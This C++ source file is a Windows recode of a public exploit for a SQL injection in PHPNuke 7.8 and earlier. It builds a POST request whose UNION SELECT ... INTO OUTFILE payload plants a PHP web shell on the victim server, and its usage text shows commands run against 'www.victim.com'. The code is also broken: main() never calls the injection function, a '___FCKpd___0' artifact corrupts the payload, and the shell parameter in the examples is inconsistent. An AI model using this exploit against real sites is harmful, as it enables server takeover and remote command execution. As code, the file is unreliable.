/*
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
--------------------------------------------------------------------------------
Critical SQL Injection PHPNuke <= 7.8 - Your_Account
founded by sp3x from www.securtiyreason.com
This exploit is based on this exploit:
http://securityreason.com/achievement_exploitalert/7
--------------------------------------------------------------------------------
recoded for windows (winsock): by unitedbr Date: 17.02.2006
Compiled in VC++
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>cl phpnuke78.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
phpnuke78.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:phpnuke78.exe
phpnuke78.obj
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>
--------------------------------------------------------------------------------
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>phpnuke78
############################################################
# Untruth Labs presents #
# #
# EXPLOIT for PHPNuke <= 7.8 #
# Original code by: sp3x - Date: 16.02.2006 #
# http://securityreason.com/achievement_exploitalert/7 #
# #
# Recoded for windows: by unitedbr #
# Date: 17.02.2006 #
############################################################
Usage :
phpnuke78 HOST /[path_phpnuke] [s_directory]
HOST - Host where is phpnuke example: localhost
[path_phpnuke] - PHPNuke directory
[s_directory] - shell directory where to upload
Example :
phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php
After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>
--------------------------------------------------------------------------------
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
void usage(void);
void sqlinj(SOCKET sock, char *argv[]);
int main(int argc, char *argv[])
{
int i, count;
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("[x] Error at WSAStartup()\n");
exit(EXIT_FAILURE);
}
if(argc != 4)
usage();
// Create a socket.
SOCKET sock;
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sock == INVALID_SOCKET ) {
printf( "\n[x] Creating socket error: %ld [FAILED]\n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("\n[!] Creating socket [OK]\n");
struct hostent *he;
struct sockaddr_in addr;
/* get IP address of other end */
he = gethostbyname(argv[1]);
if(he == NULL)
{
printf("[x] Resolving \"%s\" [FAILED]\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[!] Resolving \"%s\" [OK]\n", argv[1]);
memset(&addr, 0, sizeof(addr));
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR)
{
printf("[x] Connecting at %s [FAILED]\n", argv[1] );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[!] Connecting at %s [OK]\n", argv[1]);
printf("[!] Now check the shell\n"
"[!] http://%s\n\n",argv[1]);
WSACleanup();
closesocket(sock);
return 0;
}
void usage(void)
{
printf("\n\n############################################################\n"
"# Untruth Labs presents #\n"
"# #\n"
"# EXPLOIT for PHPNuke <= 7.8 #\n"
"# Original code by: sp3x - Date: 16.02.2006 #\n"
"# http://securityreason.com/achievement_exploitalert/7 #\n"
"# #\n"
"# Recoded for windows: by unitedbr #\n"
"# Date: 17.02.2006 #\n"
"############################################################\n\n"
" Usage : \n"
" phpnuke78 HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php\n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?cmd=ls \n\n");
exit(EXIT_SUCCESS);
}
void sqlinj(SOCKET sock, char *argv[])
{
FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0)
{
perror("[x] fdopen [FAILED]\n\n");
closesocket(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=unitedbr@u-labs.org&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"Untruth Shell\";system(
___FCKpd___0
GET[cmd]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[!] Sending exploit [OK]\n\n");
}
Enviar un comentario nuevo